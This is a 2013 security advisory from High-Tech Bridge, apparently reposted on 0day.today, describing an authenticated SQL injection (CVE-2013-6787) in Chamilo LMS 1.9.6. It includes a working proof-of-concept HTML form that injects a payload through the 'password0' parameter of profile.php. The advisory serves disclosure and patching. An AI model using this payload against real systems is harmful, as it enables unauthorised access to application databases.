Chamilo LMS version 1.9.6 suffers from a remote SQL injection vulnerability.
Vendor: Chamilo Association
Vulnerable Version(s): 1.9.6 and probably prior
Tested Version: 1.9.6
Advisory Publication: November 6, 2013 [without technical details]
Vendor Notification: November 6, 2013
Vendor Patch: November 9, 2013
Public Disclosure: November 27, 2013
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-6787
Risk Level: Medium
CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Chamilo LMS, which can be exploited to perform SQL Injection attacks.
1) SQL Injection in Chamilo LMS: CVE-2013-6787
The vulnerability exists due to insufficient validation of "password0" HTTP POST parameter passed to "/main/auth/profile.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.
The following exploitation example displays version of MySQL server:
<form action="http://[host]/main/auth/profile.php" method="post" name="main">
<input type="hidden" name="password0" value="' OR substring(version(),1,1)=5 -- ">
<input type="hidden" name="password1" value="password">
<input type="hidden" name="password2" value="password">
<input type="hidden" name="apply_change" value="">
<input type="hidden" name="firstname" value="first_name">
<input type="hidden" name="lastname" value="last_name">
<input type="hidden" name="username" value="username">
<input type="hidden" name="official_code" value="USER">
<input type="hidden" name="phone" value="">
<input type="hidden" name="language" value="">
<input type="hidden" name="extra_mail_notify_invitation" value="">
<input type="hidden" name="extra_mail_notify_message" value="">
<input type="hidden" name="extra_mail_notify_group_message" value="">
<input type="hidden" name="_qf__profile" value="">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>
Successful exploitation of this vulnerability requires that the application is configured during installation not to encrypt users' passwords ("Encryption method" option is set to "none").
-----------------------------------------------------------------------------------------------
Solution:
Edit the source code and apply changes according to vendor's instructions:.
More Information:
https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues#Issue-10-2013-11-06-Moderate-risk-SQL-Injection-in-specific-unrecommended-case
# 0day.today [2018-02-07] #